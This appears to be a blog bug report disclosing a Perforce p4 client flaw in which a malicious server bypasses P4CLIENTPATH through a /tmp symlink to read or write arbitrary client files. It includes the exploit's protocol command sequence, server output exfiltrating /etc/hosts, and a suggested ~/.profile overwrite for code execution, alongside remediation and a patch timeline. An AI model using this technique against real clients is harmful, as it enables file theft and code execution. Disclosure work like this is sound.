<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="UTF-8">
<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Perforce - Helix Command-Line Client P4CLIENTPATH Leading to Arbitrary File Read / Write | Alex Chapman’s Blog</title>
<meta name="generator" content="Jekyll v3.8.6" />
<meta property="og:title" content="Perforce - Helix Command-Line Client P4CLIENTPATH Leading to Arbitrary File Read / Write" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="The p4 Helix Command-Line Client uses the optional P4CLIENTPATH environment variable to restrict directories to which the application permitted to read or write files. This configuration can be trivially bypassed allowing a malicious Perforce server to read or write arbitrary files on the client system." />
<meta property="og:description" content="The p4 Helix Command-Line Client uses the optional P4CLIENTPATH environment variable to restrict directories to which the application permitted to read or write files. This configuration can be trivially bypassed allowing a malicious Perforce server to read or write arbitrary files on the client system." />
<link rel="canonical" href="https://ajxchapman.github.io/bugreports/2019/04/23/perforce-local-file-disclosure.html" />
<meta property="og:url" content="https://ajxchapman.github.io/bugreports/2019/04/23/perforce-local-file-disclosure.html" />
<meta property="og:site_name" content="Alex Chapman’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-04-23T00:00:00-05:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","description":"The p4 Helix Command-Line Client uses the optional P4CLIENTPATH environment variable to restrict directories to which the application permitted to read or write files. This configuration can be trivially bypassed allowing a malicious Perforce server to read or write arbitrary files on the client system.","url":"https://ajxchapman.github.io/bugreports/2019/04/23/perforce-local-file-disclosure.html","headline":"Perforce - Helix Command-Line Client P4CLIENTPATH Leading to Arbitrary File Read / Write","dateModified":"2019-04-23T00:00:00-05:00","datePublished":"2019-04-23T00:00:00-05:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://ajxchapman.github.io/bugreports/2019/04/23/perforce-local-file-disclosure.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="theme-color" content="#157878">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
  </head>
  <body>

      <header class="page-header" role="banner">
        <a href="/">
          <h1 class="project-name">Alex Chapman's Blog</h1>
        </a>
        <h2 class="project-tagline">A tech blog about all things bug bounty, security and development.
</h2>
        <div class="social">
          <a href="https://twitter.com/ajxchapman" target="_blank"><img src="/assets/icons/twitter.svg"></a>
          <a href="https://infosec.exchange/@ajxchapman" rel="me" target="_blank"><img src="/assets/icons/mastodon.svg"></a>
          <a href="https://github.com/ajxchapman" target="_blank"><img src="/assets/icons/github.svg"></a>
          <a href="https://hackerone.com/ajxchapman" target="_blank"><img src="/assets/icons/hackerone.svg"></a>
          <a href="https://bugcrowd.com/ajxchapman" target="_blank"><img src="/assets/icons/bugcrowd.svg"></a>
        </div>
      </header>

    <main id="content" class="main-content" role="main">
      


  

  

  
    
    
    


<article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <div class="postheader">
    <a href="/">Home</a>
  </div>
  <header class="post-header">
    <h1 class="post-title" itemprop="name headline">Perforce - Helix Command-Line Client P4CLIENTPATH  Leading to Arbitrary File Read / Write</h1>
    <p class="post-meta">
      <time datetime="2019-04-23T00:00:00-05:00" itemprop="datePublished">
        2019-04-23
      </time>
      
        • <span itemprop="category">Bug Reports</span>
      
  </header>
  <div class="post-content" itemprop="articleBody">
    <p>The <code class="highlighter-rouge">p4</code> Helix Command-Line Client uses the optional <code class="highlighter-rouge">P4CLIENTPATH</code> environment variable to restrict directories to which the application permitted to read or write files. This configuration can be trivially bypassed allowing a malicious Perforce server to read or write arbitrary files on the client system.</p>

<!--more-->

<p><em>Patch notes resulting from this bug report be viewed at <a href="https://www.perforce.com/perforce/r19.1/user/relnotes.txt">https://www.perforce.com/perforce/r19.1/user/relnotes.txt</a> #1810430 (Bug #98540)</em></p>

<pre class="bugreport">
Description:       Helix Command-Line Client P4CLIENTPATH  Leading to Arbitrary File Read / Write
Versions Affected: 2014.1 through 2019.1 Patch 1
Category:          Arbitrary File Read / Write
Reporter:          Alex Chapman

Summary:
--------
The `p4` Helix Command-Line Client uses the optional `P4CLIENTPATH` environment variable to restrict directories to which the application is permitted to read or write files. This configuration can be trivially bypassed allowing a malicious Perforce server to read or write arbitrary files on the client system.

Details:
--------
The optional `P4CLIENTPATH` environment variable is meant to restrict directories to which the `p4` client application is permitted to read or write files. No matter the value of the environment variable, the client is permitted to write files to the `/tmp` directory, and there is no restriction on creating symbolic links.

Since the `p4` Helix Command-Line Client responds to arbitrary server commands, including the `client-WriteFile` and `client-SendFile` commands, a malicious Perforce server can create a symbolic link to the root directory from the `/tmp` directory (using the `client-WriteFile` command) in order to disclose the contents of arbitrary files from the client system, or write arbitrary files to the client system. 

Analysis:
---------
Exploitation of this vulnerability allows a malicious server to write arbitrary data to any file path accessible to the user running the `p4` client, regardless of the `P4CLIENTPATH` configuration. As an example of exploiting this issue, overwriting a `~/.profile` on *nix base systems would allow for Remote Code Execution when the user next starts a shell. Alternatively, a malicious server can request the client send the contents of arbitrary files, potentially disclosing sensitive client information.

This issue could be exploited in several ways, including:
1. Abusing CI/CD systems which allow users to specify arbitrary Perforce servers from which to obtain source
2. Intercepting non-TLS encrypted p4 connections on untrusted networks (e.g. Public Wifi)
3. Convincing users through the use of social engineering techniques to connect to a malicious Perforce server

In order to remediate this issue the creation of Symbolic Links should be restricted when the `P4CLIENTPATH` environment variable is configured.

Proof of Concept:
-----------------
See the Proof of Concept Python3 script at ***redacted***. Below is the server side output of this script when a p4 client connects using the `./p4 -p &lt;server_address&gt;:&lt;server_port&gt; login` command with the `P4CLIENTPATH` environment variable set to `/home/user/p4/`. This output shows the contents of the clients `/etc/host` file being sent to the server.

# python3 server.py 1667
p4server listening on 0.0.0.0:1667
Received connection
 &lt; Receiving commands
protocol(cmpfile='', client='85', api='99999', enableStreams='', enableGraph='', expandAndmaps='', host='ubuntu', port='perforce.example.com:1667', sndbuf='319487', rcvbu
f='319488')
 &gt; Sending commands
protocol(xfiles='7', server='3', server2='46', serverID='master', revver='9', tzoffset='0', security='3', sndbuf='34559', rcvbuf='280800', autoTune='1')
 &gt; Sending commands
client-Ping()
 &lt; Receiving commands
user-login(version='2018.2/LINUX26X86_64/1751184', autoLogin='', prog='p4', client='ubuntu', cwd='/home/user/p4', host='ubuntu', os='UNIX', user='user
', charset='1', clientCase='0')
 &gt; Sending commands
client-OpenFile(path='/tmp/symlink', type='400', handle='sync')
 &gt; Sending commands
client-WriteFile(data='/\n', handle='sync')
 &gt; Sending commands
client-CloseFile(data='', commit='', handle='sync')
 &gt; Sending commands
client-SendFile(handle='0', path='/tmp/symlink/etc/hosts', open='open_file_result', write='read_file_result', confirm='confirm', decline='decline')
 &gt; Sending commands
release()
 &lt; Receiving commands
dm-Ping()
 &lt; Receiving commands
open_file_result(fileSize='232', handle='0', path='/tmp/symlink/etc/hosts', open='open_file_result', write='read_file_result', confirm='confirm', decline='decline')
 &lt; Receiving commands
read_file_result(data='127.0.0.1\tlocalhost\n127.0.1.1\tubuntu\n...', handle='0')
Contents of '/tmp/symlink/etc/hosts':
        127.0.0.1       localhost
        127.0.1.1       ubuntu

        # The following lines are desirable for IPv6 capable hosts
        ::1     ip6-localhost ip6-loopback
        fe00::0 ip6-localnet
        ff00::0 ip6-mcastprefix
        ff02::1 ip6-allnodes
        ff02::2 ip6-allrouters

 &lt; Receiving commands
confirm(data='', fileSize='232', digest='0991B6FEC21002CDCA46AA738B3BBDA6', time='1568203510', handle='0', path='/tmp/symlink/etc/hosts', open='open_file_result', write='rea
d_file_result', confirm='confirm', decline='decline')
 &lt; Receiving commands
release2()

Timeline
--------
20190423 - Supplied perforce with vulnerability details
20190423 - Initial vendor response and request for more information
20190423 - Further information supplied
20190425 - Issue Confirmed
20190903 - Patch issued Perforce #1810430 (Bug #98540)
</pre>

  </div>

  <div class="postfooter">
    <a href="/">Home</a>
    
      <a href="/bugreports/index.html">More Bug Reports posts</a>
    
  </div>
</article>



      <footer class="site-footer">
        
        <span class="site-footer-credits">This page was generated by <a href="https://pages.github.com">GitHub Pages</a>.</span>
      </footer>
    </main>
  </body>
</html>
